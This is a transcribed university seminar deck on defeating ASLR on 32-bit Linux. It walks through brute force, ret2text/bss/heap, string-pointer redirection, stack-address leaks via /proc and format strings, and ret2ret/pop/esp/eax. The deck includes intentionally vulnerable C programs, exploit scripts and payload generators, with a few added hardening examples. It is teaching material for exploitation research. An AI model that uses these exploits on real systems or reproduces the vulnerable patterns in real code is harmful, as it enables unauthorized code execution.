Computer Science, Informatik 4
Communication and Distributed Systems

ASLR
Address Space Layout Randomization
Seminar on Advanced Exploitation Techniques
Chair of Computer Science 4
RWTH Aachen
Tilo Müller

What is ASLR?
- A security technology to prevent exploitation of buffer overflows
- Most popular alternative: Nonexecutable stack
- Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006)
- Earlier third party implementations: PaX (since 2000)

How does ASLR work?
- ASLR = Address Space Layout Randomization
- Aim: Introduce randomness into the address space of each instantiation
  (24 bits of a 32-bit address are randomized)
→ Addresses of infiltrated shellcode are not predictable anymore
→ Common exploitation techniques fail, because the place of the shellcode is unknown

[Figure: process memory of two instantiations of the same program. The stack of the 1st instantiation lies at bfaa2e58 (entries at bfaa2e14, bfaa2e10), the stack of the 2nd instantiation at bf9114c8 (entries at bf911484, bf911480).]

How does ASLR work?

getEBP.c:

    #include <stdio.h>

    /* Copies the frame pointer into %eax, the register in which a 32-bit x86
       function returns its result, so no explicit return statement is needed. */
    unsigned long getEBP(void) {
        __asm__("movl %ebp,%eax");
    }

    int main(void) {
        printf("EBP: %lx\n", getEBP());
        return 0;
    }

Demonstration:

ASLR disabled:

    > ./getEBP
    EBP:bffff3b8
    > ./getEBP
    EBP:bffff3b8

ASLR enabled:

    > ./getEBP
    EBP:bfaa2e58
    > ./getEBP
    EBP:bf9114c8

What is randomized?
- Only the stack and libraries
  (e.g. not the heap, text, data and bss segment)

Demonstration (two runs):

    > cat /proc/self/maps | egrep '(libc|heap|stack)'
    0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
    b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    b7fa5000-b7fa6000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    bfa0d000-bfa22000 rw-p bffeb000 00:00 0 [stack]
    > cat /proc/self/maps | egrep '(libc|heap|stack)'
    0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
    b7da0000-b7ee7000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    b7ee7000-b7ee8000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    b7ee8000-b7eea000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
    bfa86000-bfa9b000 rw-p bffeb000 00:00 0 [stack]
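A check for which regions ASLR actually moves, added here as an example that is not part of the slides: it parses two /proc/<pid>/maps snapshots (the two dumps above, embedded as constructed input) and reports per region whether the base address changed between runs. The function names are mine.

```c
#include <stdio.h>
#include <string.h>

#define MAX_LINE 512

/* One parsed line of /proc/<pid>/maps: address range, permissions and the
 * name column (a pathname, "[heap]", "[stack]", or "" for anonymous memory). */
struct mapping {
    unsigned long start, end;
    char perms[5];
    char name[256];
};

/* Parse one maps line of the form "start-end perms offset dev inode [name]".
 * Returns 1 on success, 0 if the line does not have that shape. */
int parse_maps_line(const char *line, struct mapping *m) {
    unsigned long offset, inode;
    char dev[16];
    int n = sscanf(line, "%lx-%lx %4s %lx %15s %lu %255s",
                   &m->start, &m->end, m->perms, &offset, dev, &inode, m->name);
    if (n < 6) return 0;
    if (n == 6) m->name[0] = '\0';   /* anonymous mapping: no name column */
    return 1;
}

/* Start address of the first mapping in the snapshot whose name matches
 * (for a library that is its r-xp segment). Returns 0 if absent. */
unsigned long region_base(const char *snapshot, const char *name) {
    char line[MAX_LINE];
    const char *p = snapshot;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        struct mapping m;
        if (parse_maps_line(line, &m) && strcmp(m.name, name) == 0)
            return m.start;
        if (!nl) break;
        p = nl + 1;
    }
    return 0;
}

/* 1 if the region's base differs between the two runs (randomized),
 * 0 if it is identical in both (not randomized), -1 if missing. */
int region_randomized(const char *run1, const char *run2, const char *name) {
    unsigned long a = region_base(run1, name), b = region_base(run2, name);
    if (a == 0 || b == 0) return -1;
    return a != b;
}

/* Constructed input: the two egrep'd dumps shown on the slide. */
static const char RUN1[] =
    "0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]\n"
    "b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "b7fa5000-b7fa6000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "bfa0d000-bfa22000 rw-p bffeb000 00:00 0 [stack]\n";
static const char RUN2[] =
    "0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]\n"
    "b7da0000-b7ee7000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "b7ee7000-b7ee8000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "b7ee8000-b7eea000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so\n"
    "bfa86000-bfa9b000 rw-p bffeb000 00:00 0 [stack]\n";

int main(void) {
    const char *regions[] = { "[heap]", "/lib/i686/cmov/libc-2.7.so", "[stack]" };
    for (size_t i = 0; i < sizeof regions / sizeof regions[0]; i++) {
        int r = region_randomized(RUN1, RUN2, regions[i]);
        printf("%-28s %s\n", regions[i],
               r < 0 ? "missing" : r ? "randomized" : "NOT randomized");
    }
    return 0;
}
```

To check a live binary, capture /proc/self/maps (or /proc/<pid>/maps) from two separate runs and pass the two texts in place of RUN1 and RUN2; on a current kernel with a PIE executable the heap and text bases move as well, and the check reports them as randomized.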

Overview of ASLR resistant exploits
1. Brute force
2. Return into non-randomized memory
3. Pointer redirecting
4. Stack divulging methods
5. Stack juggling methods

More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors)

1. Bruteforce

Success of bruteforce is based on:
- The tolerance of an exploit to variations in the address space layout
  (e.g. how many NOPs can be placed in the buffer)
- How many exploitation attempts can be performed
  (e.g. it is necessary that a network daemon restarts after a crash)
- How fast the exploitation attempts can be performed
  (e.g. locally vs. over the network)

Example, vuln.c:

    #include <string.h>

    /* unbounded copy of argv[1] into a 4096-byte stack buffer */
    void function(char *args) {
        char buff[4096];
        strcpy(buff, args);
    }

    int main(int argc, char *argv[]) {
        function(argv[1]);
        return 0;
    }

1. Bruteforce

[Figure: three attempts against the 4096-byte buffer. Each attempt fills the buffer with NOPs followed by the shellcode (ESP → start of the buffer) and overwrites RIP with a plausible value bf... (EBP → RIP); attempts 1 and 2 miss, attempt 3 hits.]

1. Bruteforce

Chance: 1 to 2^24/4096 = 4096 → 2048 attempts on average
Solution: Upgrade to a 64-bit architecture

bruteforce.sh:

    #! /bin/sh
    i=0
    while [ 0 ]; do
        ./vuln `./exploit $i`
        i=$(($i + 2048))
        if [ $i -gt 16777216 ]; then
            i=0
        fi
    done;

Exemplary bruteforce attack: it takes about 3 minutes on a 1.5 GHz CPU to get the exploit working:

    ...
    Return Address: 0xbfa38901
    ./bruteforce.sh: line 9: 19081 Segmentation fault
    Return Address: 0xbfa39101
    sh-3.1$

2. Return into non-randomized memory

- Stack: parameters and dynamic local variables (randomized)
- Heap: dynamically created data structures (malloc) (not randomized)
- BSS: uninitialized global and static local variables (not randomized)
- Data: initialized global and static local variables (not randomized)
- Text: readonly program code (not randomized)

→ Exploitation Techniques: ret2heap, ret2bss, ret2data, ret2text

2a. ret2text

The text region is marked readonly
→ it is only possible to manipulate the program flow
(advanced: borrowed code)

Example, vuln.c:

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    void public(char* args) {
        char buff[12];
        strcpy(buff,args);        /* unbounded copy into a 12-byte buffer */
        printf("public\n");
    }

    void secret(void) {
        printf("secret\n");
    }

    int main(int argc, char* argv[]) {
        if (getuid() == 0) secret();
        else public(argv[1]);
    }

2a. ret2text

exploit.sh:

    #! /bin/bash
    ./vuln `perl -e 'print "A"x16; print "\xfa\x83\x04\x08"'`

[Figure: stack after the overflow: buff / AAAA, SFP / AAAA, RIP / 0x080483fa, which points into the text segment at 0x080483fa: void secret(void).]
- 2b. ret2bss
- char globalbuf[256];
- void function(char* input) {
- char localbuf[256];
- strcpy(localbuf, input);
- strcpy(globalbuf, localbuf);
- }
- int main(int argc, char** argv) {
- function(argv[1]);
- }
- vuln.c
- - The bss segment contains the uninitialized global variables:
- - Two buffers are needed, one on the stack and one in the bss segment

2b. ret2bss

[Figure: the randomized stack holds local buff (AAAA ... shellcode), SFP (AAAA) and RIP (0x080495e0); the same data is copied into global buff at 0x080495e0 in the not-randomized bss segment, which therefore holds a second copy of the shellcode at a known address.]

2c. ret2data / 2d. ret2heap

Similar to ret2bss. Examples of vulnerable code:

- Data: Initialized global variables

    #include <string.h>

    /* initialized global: lives in the data segment (declared as an array so that
       it is writable; a char* to a string literal would point into read-only .rodata) */
    char globalbuf[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

    void function(char* input) {
        char localbuf[256];
        strcpy(localbuf, input);
        strcpy(globalbuf, localbuf);
    }

- Heap: Dynamically created data structures

    #include <stdlib.h>
    #include <string.h>

    void function(char* input) {
        char local_buff[256];
        char *heap_buff;
        strcpy(local_buff,input);
        heap_buff = (char *) malloc(sizeof(local_buff));
        strcpy(heap_buff,local_buff);
    }

3. Pointer redirecting

- Hardcoded strings are saved within non-randomized areas
  → It is possible to redirect a string pointer to another one
- Interesting string pointers are arguments of system, execve, ...
- Example, vuln.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char* args[]) {
        char input[256];
        char *conf = "test -f ~/.progrc";
        char *license = "THIS SOFTWARE IS PROVIDED...\n";
        printf(license);
        strcpy(input,args[1]);          /* unbounded copy of args[1] */
        if (system(conf)) printf("Error: missing .progrc\n");
    }

Goal: Execute system("THIS SOFTWARE IS...\n");
→ system tries to execute THIS → write a script called THIS, e.g.:

    #! /bin/bash
    /bin/bash

3. Pointer redirecting

[Figure, before the overflow: on the stack, input, *conf = 0x08048550 and *license = 0x08048562; in the data segment, 0x08048550: "test -f ~/.progrc" and 0x08048562: "THIS SOFTWARE IS ...". system(conf) = system("test -f ~/.progrc").]

[Figure, after the overflow: input is filled with AAAA and *conf is overwritten with 0x08048562, so system(conf) = system("THIS SOFTWARE IS...").]

3. Pointer redirecting

exploit.sh:

    #! /bin/sh
    echo "/bin/sh" > THIS
    chmod 777 THIS
    PATH=.:$PATH
    ./vuln `perl -e 'print "A"x256; print "\x62\x85\x04\x08"x2'`

4. Stack divulging methods

- Goal: Discover information about the address space layout
- Possibility 1: Stack stethoscope (/proc/<pid>/stat)
- Possibility 2: Format string vulnerabilities

vuln.c:

    #include <stdio.h>
    #include <string.h>
    #include <strings.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    #define SA struct sockaddr
    int listenfd, connfd;

    void function(char* str) {
        char readbuf[256];
        char writebuf[256];
        strcpy(readbuf,str);                  /* unbounded copy of client data */
        sprintf(writebuf,readbuf);            /* client data used as the format string */
        write(connfd,writebuf,strlen(writebuf));
    }

    int main(int argc, char* argv[]) {
        char line[1024];
        struct sockaddr_in servaddr;
        ssize_t n;
        listenfd = socket (AF_INET, SOCK_STREAM, 0);
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
        servaddr.sin_port = htons(7776);
        bind(listenfd, (SA*)&servaddr, sizeof(servaddr));
        listen(listenfd, 1024);
        for(;;) {
            connfd = accept(listenfd, (SA*)NULL,NULL);
            write(connfd,"> ",2);
            n = read(connfd, line, sizeof(line)-1);
            line[n] = 0;
            function(line);
            close(connfd);
        }
    }

4a. Stack stethoscope

- Address of a process stack's bottom: 28th item of /proc/<pid>/stat
- The remaining stack can be calculated, since offsets are constant
- The stat-file is readable by every user per default:

    > dir /proc/$(pidof vuln)/stat
    -r--r--r-- 1 2008-02-26 22:01 /proc/12356/stat

- Disadvantage: Access to the machine is required
  Advantage: ASLR is almost useless if one has this access

4a. Stack stethoscope

[Figure: from the stack bottom downwards: ..., the frame of main, the frame of function (SFP, RIP, readbuf, writebuf). The distance between the stack bottom and the buffers is a constant offset (bfe14f30 - bfe14858 = 6d8).]

4a. Stack stethoscope

[Figure: the same layout, with the shellcode placed in writebuf at address sb - offset, where]

    sb = cat /proc/$(pidof vuln)/stat | awk '{ print $28 }'
    offset = 6d8

4b. Format strings
The line sprintf(writebuf,readbuf) in vuln.c above is a format string vulnerability that can be used to receive stack addresses.

Correct:

    sprintf(writebuf,"%s",readbuf);

Advantage: No access to the machine is required.
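A hardened replacement for function() from vuln.c, added here as an example that is not part of the slides (format_reply and the two check helpers are my names): it bounds the copy that strcpy left unbounded and passes the client string as an argument to a fixed "%s" format, so a probe such as "%20$x" comes back unchanged instead of leaking a stack word.

```c
#include <stdio.h>
#include <string.h>

/* Drop-in replacement for the body of function() in vuln.c above. The client
 * string is copied with a bound instead of strcpy(), and it is the argument of
 * a fixed "%s" format rather than the format itself, so a directive such as
 * "%20$x" is echoed back literally instead of reading a word off the stack.
 * Returns the number of bytes stored in writebuf (without the terminator). */
size_t format_reply(char *writebuf, size_t writelen, const char *str) {
    char readbuf[256];
    int n;
    if (writelen == 0) return 0;
    /* bounded copy: snprintf always NUL-terminates and never overruns readbuf */
    snprintf(readbuf, sizeof readbuf, "%s", str);
    /* fixed format; readbuf is an argument, so its '%' characters are plain data */
    n = snprintf(writebuf, writelen, "%s", readbuf);
    if (n < 0) { writebuf[0] = '\0'; return 0; }
    /* snprintf reports the untruncated length; cap it to what was stored */
    return (size_t)n < writelen ? (size_t)n : writelen - 1;
}

/* Helper for the checks: reply length for a client string of `count` bytes 'A'
 * (count is clamped to 1023), to show that long input is truncated, not overflowed. */
size_t reply_len_for_run(size_t count) {
    char input[1024], out[256];
    if (count >= sizeof input) count = sizeof input - 1;
    memset(input, 'A', count);
    input[count] = '\0';
    return format_reply(out, sizeof out, input);
}

/* 1 if the reply is byte-for-byte the client string (no directive was expanded). */
int reply_is_literal(const char *input) {
    char out[256];
    format_reply(out, sizeof out, input);
    return strcmp(out, input) == 0;
}

int main(void) {
    char out[256];
    /* constructed client input: the probe from the slide's nc example */
    size_t n = format_reply(out, sizeof out, "%20$x");
    printf("%zu bytes written: %s\n", n, out);   /* the reply is the literal %20$x */
    return 0;
}
```

The reply is then sent with write(connfd, writebuf, n) as before; the stack-address leak the slide demonstrates with "%20$x" no longer occurs because the directive is never interpreted.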

4b. Format strings

[Figure: the stack during sprintf() inside function(): the format string "%20$x" prints the 20th parameter above the format string, which is a stack address (bfb71ec8); its distance to the stack bottom is again a constant offset (bfb72550 - bfb71ec8 = 688).]

→ The stack bottom can be calculated by an exploitation of the format string vulnerability
→ Afterwards the exploit from the stethoscope attack can be used again

Example:

    > echo "%20\$x" | \
    > nc localhost 7776
    > bfb71ec8

5a. ret2ret

Based on a pointer that is a potential pointer to the shellcode.

[Figure: stack layout: buff, SFP, RIP, ..., and further up a Pointer that may point back into buff.]

5a. ret2ret

A potential pointer points to the shellcode if its least significant byte is overwritten by zero (string termination).
But how to use this aligned pointer as return instruction pointer?

[Figure: buff holds NOPs ... shellcode ...; above it lie the words marked ?? and the Pointer, whose last byte is now x00.]

5a. ret2ret

Solution: chain of ret's.
ret can be found in the text segment (which is not randomized)

[Figure: buff holds NOPs ... shellcode ...; the words above it, up to the Pointer (x00), are overwritten with &ret.]

5a. ret2ret

[Figure, animated over several slides: function b() has been called by a(); the stack holds buff (NOPs ... shellcode ...), then &ret, &ret, ..., Pointer x00. The function epilogue of b pops through the chain: each ret loads the next &ret into EIP and moves ESP up one word (EBP is undefined after leave, marked ???), until the Pointer x00 is popped into EIP and execution lands in the NOP sled.]

function epilogue of b:

    leave   = movl %ebp,%esp
              popl %ebp
    ret     = popl %eip

5a. ret2ret

vuln.c:

    #include <string.h>

    void function(char* overflow) {
        char buffer[256];
        strcpy(buffer, overflow);
    }

    int main(int argc, char** argv) {
        int no = 1;
        int* ptr = &no;          /* the potential pointer in main's frame */
        function(argv[1]);
        return 1;
    }

exploit.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define RET 0x0804840f
    #define NOP 0x90                 /* x86 nop opcode */
    extern const char shellcode[];   /* not shown on the slide */

    int main(void) {
        char *buff, *ptr;
        long *adr_ptr;
        int i;
        int buf_size = 280;
        int ret_size = 20;
        buff = malloc(buf_size + 1);          /* +1 for the terminating '\0' */
        ptr = buff;
        adr_ptr = (long *) ptr;
        for (i=0; i<buf_size; i+=4)           /* fill the whole buffer with &ret */
            *(adr_ptr++) = RET;
        for (i=0; i<buf_size-ret_size; i++)   /* NOP sled in front of the ret chain */
            buff[i] = NOP;
        ptr = buff + (buf_size-ret_size-strlen(shellcode));
        for (i=0; i<strlen(shellcode); i++)   /* shellcode directly before the chain */
            *(ptr++) = shellcode[i];
        buff[buf_size] = '\0';
        printf("%s",buff);
        return 0;
    }

5b. ret2pop

After strcpy the shellcode is stored redundantly in memory.
Idea: Use a perfect pointer to the shellcode placed in argv.

[Figure: stack: buff, SFP, RIP, ..., Pointer → argv ... shellcode; EIP = that pointer.]

5b. ret2pop

Problem: Avoid overwriting the least significant byte of the perfect pointer by zero.

[Figure: the overflow through buff, SFP and RIP reaches the Pointer, whose last byte becomes x00 (marked X), so it no longer points at the shellcode in argv.]

5b. ret2pop

Solution: A ret-chain followed by pop-ret.
The pop instruction skips over the memory location which is overwritten by zero.

[Figure: buff, ..., &ret, ..., &pop-ret, x00, Pointer → argv ... shellcode.]

5b. ret2pop

vuln.c:

    #include <string.h>

    int function(int x, char *str) {
        char buf[256];
        strcpy(buf,str);
        return x;
    }

    int main(int argc, char **argv) {
        function(64, argv[1]);
        return 1;
    }

exploit.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define POPRET 0x08048467
    #define RET 0x08048468
    extern const char shellcode[];   /* not shown on the slide */

    int main(void) {
        char *buff, *ptr;
        long *adr_ptr;
        int i;
        buff = malloc(264 + 1);          /* +1 for the terminating '\0' */
        for (i=0; i<264; i++)
            buff[i] = 'A';
        ptr = buff+260;
        adr_ptr = (long *) ptr;
        for (i=260; i<264; i+=4)
            if (i == 260) *(adr_ptr++) = POPRET;
            else *(adr_ptr++) = RET;
        ptr = buff;
        for (i=0; i<strlen(shellcode); i++)
            *(ptr++) = shellcode[i];
        buff[264] = '\0';
        printf("%s",buff);
        return 0;
    }

5c. ret2esp

The position of the ESP is predictable during the function epilogue.
→ jmp *%esp

[Figure: stack layout: buff, SFP, RIP, with EBP and ESP marked.]

5c. ret2esp

[Figure, animated over several slides: the stack holds buff, ..., RIP overwritten with &jmp *%esp, followed by the shellcode. During the function epilogue (leave; ret), ret pops &jmp *%esp into EIP, ESP then points at the word right after it, i.e. the shellcode (EBP is undefined, marked ?), and jmp *%esp in the text segment transfers control there.]

function epilogue:

    leave   = movl %ebp,%esp
              popl %ebp
    ret     = popl %eip

text segment, somewhere:

    jmp *%esp

5c. ret2esp

Problem: jmp *%esp is not produced by gcc
Solution: Search the hexdump of a binary for e4ff, which will be interpreted as jmp *%esp.
Example: The hardcoded number 58623 dec = e4ff hex

The chance to find e4ff in practice increases with the size of a binary.

    > hexdump /usr/bin/* | grep e4ff | wc -l
    1183

5c. ret2esp

vuln.c:

    #include <string.h>

    void function(char* str) {
        char buf[256];
        strcpy(buf,str);
    }

    int main(int argc, char** argv) {
        int j = 58623;           /* immediate 0xe4ff: the bytes ff e4 (jmp *%esp) end up in the text segment */
        function(argv[1]);
        return 1;
    }

exploit.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define JMP2ESP 0x080483e8
    extern const char shellcode[];   /* not shown on the slide */

    int main(void) {
        char *buff, *ptr;
        long *adr_ptr;
        int i;
        /* room for the 264-byte fill, the shellcode and the '\0'; +4 because the
           word-wise fill below may run up to three bytes past 264+strlen(shellcode) */
        buff = malloc(264 + strlen(shellcode) + 4);
        ptr = buff;
        adr_ptr = (long *)ptr;
        for (i=0; i<264+strlen(shellcode); i+=4)
            *(adr_ptr++) = JMP2ESP;
        ptr = buff+264;
        for (i=0; i<strlen(shellcode); i++)
            *(ptr++) = shellcode[i];
        buff[264+strlen(shellcode)] = '\0';
        printf("%s",buff);
        return 0;
    }

5d. ret2eax

Return values are stored in EAX.
→ EAX could contain a perfect shellcode pointer after a function returns a pointer to user input.
→ Overwrite RIP by a pointer to a call *%eax instruction

Example: strcpy(buf,str) returns a pointer to buf, i.e.

    bufptr = strcpy(buf,str);

causes EAX and bufptr to point to the same location as buf.

vuln.c:

    #include <string.h>

    void function(char* str) {
        char buf[256];
        strcpy(buf, str);
    }

    int main(int argc, char **argv) {
        function(argv[1]);
        return 1;
    }

5d. ret2eax

[Figure, animated over several slides: main() calls function(), which calls strcpy(). After strcpy returns, EAX → buf, which now holds the shellcode followed by copies of &call *%eax that overwrite SFP and RIP. The epilogue of function() (leave; ret) pops &call *%eax into EIP (EBP is undefined afterwards, marked ?), and call *%eax transfers control to the shellcode in buf.]

function epilogue:

    leave   = movl %ebp,%esp
              popl %ebp
    ret     = popl %eip

5d. ret2eax

vuln.c: as shown above.

exploit.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define CALLEAX 0x08048453
    extern const char shellcode[];   /* not shown on the slide */

    int main(void) {
        char *buff, *ptr;
        long *adr_ptr;
        int i;
        buff = malloc(264 + 1);          /* +1 for the terminating '\0' */
        ptr = buff;
        adr_ptr = (long *)ptr;
        for (i=0; i<264; i+=4)
            *(adr_ptr++) = CALLEAX;
        ptr = buff;
        for (i=0; i<strlen(shellcode); i++)
            *(ptr++) = shellcode[i];
        buff[264] = '\0';
        printf("%s",buff);
        return 0;
    }

Find &call *%eax:

    > objdump -D vuln | grep -B 2 "call"
    804844f: 74 12 je 8048463
    8048451: 31 db xor %ebx,%ebx
    8048453: ff d0 call *%eax

Summary
1. Brute force
2. Return into non-randomized memory
   a) ret2text
   b) ret2bss
   c) ret2data
   d) ret2heap
3. Pointer redirecting
   a) String pointer
4. Stack divulging methods
   a) Stack stethoscope
   b) Format string vulnerabilities
5. Stack juggling methods
   a) ret2ret
   b) ret2pop
   c) ret2esp
   d) ret2eax

Additionally in the paper:
- DoS by format string vulnerabilities
- Redirecting function pointers
- Integer overflows
- GOT and PLT hijacking
- Off by one
- Overwriting .dtors